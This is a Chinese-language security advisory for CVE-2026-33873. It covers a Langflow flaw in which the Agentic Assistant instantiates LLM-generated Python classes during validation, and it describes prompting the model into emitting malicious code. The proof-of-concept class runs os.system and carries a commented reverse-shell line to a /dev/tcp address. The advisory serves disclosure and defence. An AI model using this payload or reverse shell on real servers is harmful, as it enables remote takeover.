CVE-2026-33873 CVSS 9.9 严重

CVE-2026-33873 Langflow 任意代码执行漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33873

漏洞类型

远程代码执行

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Langflow

漏洞概述

Langflow在1.9.0版本前存在任意代码执行漏洞。其Agentic Assistant功能在验证LLM生成的Python代码时，直接在服务端动态实例化生成的类。攻击者若能访问该功能并影响模型输出，即可导致服务器端执行任意Python代码。

技术细节

该漏洞的根本原因在于Langflow对Agentic Assistant生成代码的验证机制不完善。在验证阶段，系统不仅仅是静态分析代码，而是通过动态执行（如exec）和类实例化来测试代码逻辑。由于缺乏沙箱隔离，攻击者可以通过精心设计的Prompt诱导LLM生成包含恶意系统调用（如os.system）的Python代码。当后端服务尝试实例化该类时，恶意代码立即在服务器上下文中执行，从而允许攻击者完全控制受影响的服务器。

攻击链分析

STEP 1

攻击者获取对Langflow Agentic Assistant功能的访问权限。

STEP 2

攻击者发送特制的输入提示，诱导AI模型生成包含恶意Python代码的组件类。

STEP 3

Langflow后端接收生成的代码，并在验证阶段尝试实例化该类。

STEP 4

恶意代码在服务端被动态执行，导致任意命令执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# This payload is designed to be generated by the LLM
# and executed during the validation phase.

import os

class ExploitComponent:
    """A malicious component to execute system commands."""
    def __init__(self):
        # Demonstrate arbitrary code execution
        os.system("touch /tmp/langflow_pwned")
        # Example: Reverse shell
        # os.system("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1")

    def validate(self):
        return True

影响范围

Langflow < 1.9.0

防御指南

临时缓解措施

建议立即将Langflow升级到最新版本。如果暂时无法升级，应禁用Agentic Assistant功能，或将其部署在隔离的网络环境中，以防止潜在的代码执行风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表